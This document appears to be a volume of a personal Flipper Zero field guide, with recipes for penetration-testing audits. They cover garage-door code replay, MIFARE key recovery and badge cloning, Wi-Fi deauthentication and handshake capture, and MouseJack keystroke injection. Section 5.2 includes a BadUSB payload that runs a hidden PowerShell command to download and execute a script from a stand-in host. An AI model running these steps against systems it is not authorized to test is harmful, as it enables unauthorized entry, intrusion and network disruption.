Flipper Zero · Volume 11

Flipper Zero Volume 11 — Workflows & Recipes

End-to-end field recipes — garage-door analysis, RFID badge audit, BLE keyboard pentest, NFC tag programming, SDR companion mode

Contents

SectionTopic
1About this Volume
2Garage-Door Audit (Sub-GHz)
· 2.1Recon
· 2.2Capture
· 2.3Replay (static codes only)
· 2.4Rolling-code reality
· 2.5Documentation
3RFID Badge Audit (LF + HF)
· 3.1Identify the card type
· 3.2Mfkey32 / nested
· 3.3Clone to magic card / T5577
· 3.4Reporting
4IR Universal-Remote Build for an Unfamiliar Device
5BadUSB Keyboard Pentest
· 5.1Test on owned hardware first
· 5.2Real payload structure
· 5.3BLE BadKB (no USB cable)
· 5.4Caveat (important)
6Wi-Fi Audit with WiFi Devboard + Marauder
· 6.1Setup
· 6.2Recon
· 6.3Active capture (deauth + handshake)
· 6.45 GHz / Wi-Fi 6
· 6.5Legal
7NRF24 / MouseJack
8SDR Companion Mode (HackRF / RTL-SDR + Flipper)
· 8.1The pattern
· 8.2Specific recipes (cross-reference uConsole and HackRF subprojects)
9NFC Tag Programming (NTAG)
10iButton Read + Clone
11qFlipper + Mobile App Workflow
12Multi-Tool Synthesis: A Realistic Field Day
13Common Workflow Pitfalls
14What’s next

1. About this Volume

The previous volumes covered subsystems in isolation. This volume combines them into complete field workflows — start to finish, with the firmware, the modules, and the companion tools (HackRF, RTL-SDR, phone, Kali laptop, Bus Pirate when relevant) all in their right places.

Each recipe assumes:

  • tjscientist’s loadout (multiple Flippers, official WiFi Devboard + Marauder, VGM, NRF24, external CC1101 amp, Game Over, AWOK V3).
  • Momentum mainline as primary firmware.
  • Lab discipline: own the equipment or have written authorization.

2. Garage-Door Audit (Sub-GHz)

Use case: assess whether a garage door / gate uses static codes (insecure) or rolling codes (modern), and clone if static.

2.1 Recon

1. Stand 1 m from the receiver.
2. Sub-GHz → Frequency Analyzer.
3. Press the OEM remote. Note the strongest frequency.
   - 300-315 MHz → US-market (most pre-2010)
   - 433.92 MHz → EU + worldwide modern
   - 868 MHz → European modern
4. If RSSI < -60 dBm, move closer.

2.2 Capture

5. Sub-GHz → Read.
6. Press the OEM remote at the captured frequency.
7. Read what the parser says:
   - "Princeton" / "CAME" / "NICE FLO" / "Linear MegaCode" / "Holtek HT12" →
     STATIC code. Clone via Save → Send.
   - "KeeLoq" / "Hörmann (BiSecur)" / "BFT Mitto" / "FAAC SLH" →
     ROLLING code. The decoded value is good for ONE transmission.
   - "RAW" parse → fall through. Try Read RAW.

2.3 Replay (static codes only)

8. Save → name (MyGarage).
9. Sub-GHz → Saved → MyGarage → Send.
   The Flipper transmits the captured code. Door opens.
   Range: 5-10 m onboard, 70-150 m with external CC1101 amp.

2.4 Rolling-code reality

Modern garage openers (post-2014, most LiftMaster, Genie, Hörmann, Nice, etc.) use rolling codes that the Flipper can capture and decode but cannot meaningfully replay. The receiver expects the next sequence; replaying a captured one is rejected.

Some attacks against specific rolling-code implementations exist (e.g., RollJam against certain pre-2018 systems), but they require either a second device (a jammer + capture rig) or specific implementation weaknesses — out of scope for casual Flipper use, and on owned doors only.

2.5 Documentation

For an audit deliverable, capture:

  • Frequency
  • Modulation (OOK / FSK)
  • Protocol (parser output)
  • Code length (bits)
  • Whether static or rolling
  • Replay-success/fail

The captured .sub file pulled to a PC has all this in plaintext.

3. RFID Badge Audit (LF + HF)

Use case: assess what type of access cards a facility uses, attempt clone + replay on owned cards.

3.1 Identify the card type

Both LF and HF readers may share a single physical reader. Try LF first (more common in older systems):

1. RFID → Read → press card to side of Flipper.
   If parsed → EM4100 / HID Prox / Indala / etc. Note format.
   If no parse → not LF, or LF but unknown format. Try HF.

2. NFC → Read → press card to back of Flipper.
   If parsed → MIFARE Classic 1k/4k / NTAG / DESFire / etc.
   If parse fails partway → MIFARE Classic with non-default keys.
   Run the Mfkey32 / nested workflow.

3.2 Mfkey32 / nested

For MIFARE Classic with unknown sector keys:

1. NFC → Read → save what's readable as <name>.nfc.
2. NFC → Saved → <name> → Detect Reader.
   The Flipper now emulates the partial card to a real reader.
3. Wave the Flipper at the reader. Each auth attempt is captured.
4. After 10-30 captures, NFC → Saved → <name> → Mfkey32:
   the keys recovered get appended to <name>.nfc.
5. Re-read the card; previously-locked sectors now decrypt.

For nested attack against cards where one key is known:

1. Confirm one sector key known (often the default A0A1A2A3A4A5
   factory key on sector 0).
2. NFC → Saved → <name> → Nested.
3. Other sector keys are recovered in seconds.

3.3 Clone to magic card / T5577

LF (125 kHz):
  RFID → Saved → <name> → Write
  Press a blank T5577 card → wait 1-2 sec → cloned.

HF (13.56 MHz):
  NFC → Saved → <name> → Write (Magic)
  Press a magic card (Gen 1A / 1B / 2 / 3 / 4) → cloned.

3.4 Reporting

For an audit report:

  • Card type (e.g., “MIFARE Classic 1k, 16 sectors, 5 sectors using factory key A0A1A2A3A4A5, 11 sectors using custom keys”)
  • Clone success/failure
  • Recommendation: “Cards are vulnerable to mfkey32. Migrate to DESFire EV2 or higher.”

4. IR Universal-Remote Build for an Unfamiliar Device

Use case: lost the OEM remote for a 12-year-old projector; need to control it from the Flipper.

1. Find any working remote: phone IR app, original remote, vendor
   support.
2. Infrared → Learn New Remote → start with empty file.
3. For each button:
   - Add Button → press original remote at the Flipper's IR receiver.
   - Wait for parse (NEC / Sony SIRC / RC5 / RC6 / Kaseikyo / Samsung).
   - If raw, accept the raw timings.
   - Name the button (Power, VolumeUp, ChannelDown, INPUT, MENU, OK,
     UP, DOWN, LEFT, RIGHT, BACK).
4. Save as /ext/infrared/Projector.ir.
5. Open with XRemote FAP for grid layout.
6. Push to phone via Mobile App if you want both interchangeable.

A complete remote is typically 12–20 buttons captured. Most TV / projector / AV-receiver remotes use NEC at 38 kHz, so even raw fallback usually works.

For 30+ ft range, attach the Rabbit-Labs IR Blaster (Vol 9 §3.2) and configure External GPIO routing per Vol 6 §2.7.

5. BadUSB Keyboard Pentest

Use case: deliver a payload via the Flipper as a USB keyboard.

5.1 Test on owned hardware first

1. /ext/badusb/test.txt:
     DELAY 2000
     GUI r              ; Win+R
     DELAY 500
     STRING notepad
     ENTER
     DELAY 1000
     STRINGLN BadUSB self-test
2. Plug into your own laptop, run.
3. Verify the layout is right (US default; for non-US keyboard, swap
   in BadUSB → Settings → Layout).

5.2 Real payload structure

Typical attack pattern (against owned hardware!):

DELAY 5000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "$u='http://example.invalid/p.ps1';iex(irm $u)"
ENTER

Realistic latencies: target a 5-second initial DELAY (gives slow machines time to register the new HID device), 500 ms inter-keypress delays for unreliable targets.

5.3 BLE BadKB (no USB cable)

If physical insertion is impossible:

1. Momentum: BadUSB → Settings → Connection → BLE.
2. Pair the Flipper as a BLE keyboard to the target machine
   (target needs to be in pairing mode).
3. Run the script over BLE.

Slower than USB (each character has a BLE keyboard report; ~10ms each) but no cable.

5.4 Caveat (important)

Stock OFW Flipper BadUSB enumerates with USB VID identifying it as Flipper Zero. Endpoint inspection on a target reveals the device name. For stealth scenarios where the target machine has device-ID allowlisting, the Flipper is identifiable; a Hak5 Rubber Ducky (which identifies as a generic USB HID) would not be.

Custom firmwares can spoof descriptors, but this changes the legal calculus — masquerading as another device is a different liability than “bring an obvious tool”.

6. Wi-Fi Audit with WiFi Devboard + Marauder

Use case: enumerate Wi-Fi APs, capture handshakes for offline cracking.

6.1 Setup

1. WiFi Devboard plugged in via USB-C side.
2. Apps → GPIO → WiFi Marauder. Wait for UART connection ("Marauder vX.Y").
3. Optional: configure target AP allowlist via "Set Target".

6.2 Recon

4. "Sniff Beacon" — runs a beacon-probe scan, dumps APs with SSID, BSSID,
   channel, RSSI, encryption.
5. "Sniff Probe" — dumps client probe requests; identifies clients
   roaming for known SSIDs (potential evil-portal targets).
6. "Sniff Pwned" — passive WPA handshake capture as clients connect.

6.3 Active capture (deauth + handshake)

7. "Attack" → "Deauth" → pick AP → start.
   Clients drop, reconnect, EAPOL handshake captured.
8. Pull the handshake .pcap from the Devboard's microSD (or from the
   Flipper's SD if Marauder writes it there).

Where to break the handshake: not on the Flipper. Pull the .pcap to a real machine, run hashcat or aircrack-ng against a wordlist. The Flipper’s M4 doesn’t have the cycles.

6.4 5 GHz / Wi-Fi 6

WiFi Devboard is 2.4 GHz only. For 5 GHz, swap to Apex 5 (Vol 9 §2.4).

Deauth = FCC Part 15 violation in the US (jamming). Sustained TX of deauth frames is enforcement-grade illegal. Lab use into a Faraday cage / RF-shielded room only. See _shared/legal_ethics.md.

7. NRF24 / MouseJack

Use case: identify a vulnerable wireless keyboard/mouse and inject keystrokes.

1. NRF24 module plugged in (Vol 8 §4.3 pinout).
2. Apps → GPIO → Mousejacker. Pick "Sniff" → walk around the target
   environment.
   Sniffer reports BSSID, channel, vendor signature (Logitech Unifying,
   Microsoft 2.4G, etc.).
3. If a vulnerable device is detected, "Attack" → pick injection
   payload (a Ducky-script-like sequence).
4. Stand near the receiver dongle (~5-10 m on bare NRF24, 100m+ with
   PA+LNA module). Send.
5. Keystrokes appear as if from the legitimate keyboard.

Affected devices include older Logitech Unifying receivers (pre-2016 firmware), various clone keyboards, and some industrial wireless HID. Modern (2018+) Logitech firmware patched this.

8. SDR Companion Mode (HackRF / RTL-SDR + Flipper)

Use case: when you need a feature the Flipper can’t do (wideband spectrum analysis, IQ recording, modulation reverse-engineering) but the field tool you have is the Flipper.

8.1 The pattern

The Flipper is the field instrument: pocketable, on-device UI, captures one channel at a time on a known protocol. The HackRF or RTL-SDR is the lab tool: connected to a computer, sees the entire band, records IQ for offline analysis.

Workflow:

1. With the Flipper:
   - Frequency Analyzer to find the carrier.
   - Read RAW to capture timings.
2. Observe what's captured doesn't match a known parser.
3. Pull out the RTL-SDR + laptop:
   - Run GQRX or SDR++ at the captured frequency.
   - Watch the spectrum to identify the modulation visually.
   - Record IQ samples.
4. Open IQ in URH (Universal Radio Hacker):
   - Demodulate, identify symbol rate.
   - Identify the framing.
   - Reconstruct the protocol structure.
5. Back to the Flipper:
   - Write a custom parser (FAP) that handles this new protocol, or
   - Find the right preset to register-tune the CC1101 to.

This is exactly the use case _shared/comparison.md outlines: Flipper for known protocols in the field, HackRF/RTL-SDR for unknown protocols in the lab.

8.2 Specific recipes (cross-reference uConsole and HackRF subprojects)

For HackRF + GNU Radio: see ../HackRF One/03-outputs/ for workflows when those volumes are populated.

For deeper SDR work on the uConsole as a portable Linux box: see ../Clockwork uConsole/03-outputs/uConsole_Vol09_RF_SDR_Workflows.docx.

9. NFC Tag Programming (NTAG)

Use case: program NDEF data into NFC tags for use cases like business cards, smart-home triggers, Amiibo-equivalents.

1. NFC → Read → press blank NTAG (typically NTAG 215 for Amiibo;
   NTAG 213 for short URLs).
2. Save as Template.nfc.
3. Pull off the Flipper, edit /ext/nfc/Template.nfc on a PC. Specifically
   the NDEF data section.
4. Push back to the Flipper.
5. NFC → Saved → Template → Write → press blank tag.
6. Verify with phone NFC scanner — tag should fire the URL or trigger.

For Amiibo specifically: pull a .nfc of an existing Amiibo (Amiibo files are widely shared online though legality varies — check yours), write to a fresh NTAG 215. Note: modern Switch firmware has implemented anti-clone checks against some Amiibo, so a fresh-cloned NTAG 215 may be rejected by current games.

10. iButton Read + Clone

Quick recipe for completeness:

1. iButton → Read → touch the iButton key against the side pad.
2. Save as MyKey.ibtn.
3. iButton → Saved → MyKey → Emulate → touch the Flipper side pad to
   the reader pad.

For permanent clones, write to a blank DS1990A iButton via an iButton writer FAP (separate from this workflow).

11. qFlipper + Mobile App Workflow

The optimal “reach for the Flipper from any computer” pattern:

On phone (Flipper Mobile App, Android first-class, iOS limited):
  - Browse Flipper SD via BLE
  - Push files (IR remotes, captures) between phone and Flipper
  - Trigger Read / Emulate from phone
  - Crowdsourced IR remotes library

On laptop (qFlipper / Web Updater at lab.flipper.net):
  - Firmware management (install, repair, recovery)
  - Direct file copy at USB speed (much faster than BLE)
  - Live console / serial CLI
  - Bulk file management

For multiple Flippers, qFlipper handles them one at a time. Open the right qFlipper instance for each device; the device serial number identifies which.

12. Multi-Tool Synthesis: A Realistic Field Day

A realistic field day for tjscientist (multi-tool):

Pelican case opens. Inventory:
  - Flipper Zero #1 (VGM stack, primary)
  - Flipper Zero #2 (Game Over stack, multi-radio)
  - WiFi Devboard (Marauder)
  - External CC1101 amp + tuned 433/868 MHz antenna
  - HackRF One + dipole + 1090 collinear (when bought)
  - Clockwork uConsole (Kali, full toolchain)

Job: Audit a small office.

  1. Walk in with Flipper #1 (default Momentum). Open Sub-GHz Frequency
     Analyzer. Walk room — note any sub-GHz transmitters.
  2. Switch to Flipper #2 with Game Over. Open Marauder via Flipper.
     "Sniff Beacon" — capture every 2.4 GHz AP in the building.
  3. Note BSSID/SSID/channel/encryption, save .pcap.
  4. RFID/NFC near the badge reader. Capture badge type with Flipper #1.
  5. (If authorized) clone target badge to magic card, verify access.
  6. Pull out HackRF + uConsole. Park outside. Run gqrx wideband
     across 800-1100 MHz to sniff cellular/IoT traffic.
  7. Back at the lab: import .pcap into Wireshark, .sub files into
     URH, RFID dump into mfkey32. Document in a report.

The Flipper handles the on-device, in-the-moment captures. The HackRF

  • uConsole handles the wideband + decode. Both are in the same Pelican case — they’re complementary, not competing.

13. Common Workflow Pitfalls

PitfallSymptomFix
Trying to replay a rolling codeDoor doesn’t openIdentify rolling-code; abandon replay; consider out-of-band approach
Capturing too far from a sub-GHz emitterWeak / partial decodeMove within 1 m; or use external amp + tuned antenna
BadUSB script not typingLayout mismatchBadUSB → Settings → Layout = match target keyboard
Marauder can’t see APsWi-Fi device not in monitor modeConfirm Marauder is running on the Devboard; Flipper just reports
Mfkey32 captures nothingReader uses random nonce + already-fetched keymfkey32 is reader-dependent; try a different reader if available
NFC tag clones write but reader rejectsReader checks UID type / anti-collisionTry a magic card of different generation (Gen 1A/1B/2/3/4)
GPS module never gets a fixAntenna shielded; ceramic patch in pocketMove to clear sky; consider external active antenna

14. What’s next

Vol 12 — Cheatsheet. The print/laminate one-pager set — GPIO pinout, sub-GHz protocols, NFC card types, BadUSB DuckyScript, JS API, BLE re-pair, DFU recovery, firmware-switch SD layout. Carry it.